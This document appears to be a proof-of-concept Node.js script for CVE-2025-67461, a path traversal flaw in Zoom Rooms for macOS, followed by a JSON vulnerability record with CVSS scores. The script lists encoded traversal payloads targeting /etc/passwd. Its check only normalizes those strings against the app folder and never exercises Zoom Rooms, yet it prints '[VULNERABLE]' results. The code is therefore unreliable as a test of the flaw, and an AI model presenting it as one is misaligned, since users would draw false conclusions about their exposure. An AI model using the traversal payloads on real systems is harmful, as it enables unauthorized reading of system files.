CVE-2025-67461

// CVE-2025-67461 PoC - Zoom Rooms for macOS Path Traversal Information Disclosure // This PoC demonstrates the path traversal vulnerability in Zoom Rooms for macOS // Note: This is a conceptual PoC for educational purposes only const fs = require('fs'); const path = require('path'); // Target: Zoom Rooms for macOS before 6.6.0 const ZOOM_ROOMS_PATH = '/Applications/ZoomRooms.app/'; // Path traversal payloads to test const payloads = [ '../../../../etc/passwd', '../../../../Users/Shared/ZoomRooms/config/../../../../../etc/passwd', '..\\..\\..\\..\\etc\\passwd', '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd', '..%252f..%252f..%252f..%252fetc%252fpasswd', '%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd' ]; // Check if Zoom Rooms is installed function checkZoomRoomsInstalled() { try { return fs.existsSync(ZOOM_ROOMS_PATH); } catch (error) { console.error('Error checking Zoom Rooms installation:', error.message); return false; } } // Test path traversal vulnerability async function testPathTraversal() { if (!checkZoomRoomsInstalled()) { console.log('Zoom Rooms not found on this system'); return; } console.log('Testing CVE-2025-67461 Path Traversal vulnerability...'); console.log('Target: Zoom Rooms for macOS < 6.6.0'); console.log('Vulnerability: External control of file name or path'); for (const payload of payloads) { try { // Attempt to access files using path traversal const targetPath = path.join(ZOOM_ROOMS_PATH, payload); const normalizedPath = path.normalize(targetPath); if (normalizedPath.startsWith(ZOOM_ROOMS_PATH)) { console.log(`[SAFE] Path normalized and within ZoomRooms directory`); } else { console.log(`[VULNERABLE] Path traversal detected: ${payload}`); console.log(`[VULNERABLE] Resolved path: ${normalizedPath}`); } } catch (error) { console.log(`Error testing payload ${payload}: ${error.message}`); } } console.log('\nRecommended action: Upgrade to Zoom Rooms for macOS 6.6.0 or later'); } // Execute PoC testPathTraversal();

{"cve": {"id": "CVE-2025-67461", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:09.797", "lastModified": "2025-12-30T18:23:47.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "External control of file name or path in Zoom Rooms for macOS before version 6.6.0 may allow an authenticated user to conduct a disclosure of information via local access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.6.0", "matchCriteriaId": "637C04EF-8386-47E5-8D3D-7030664A42A5"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25051", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}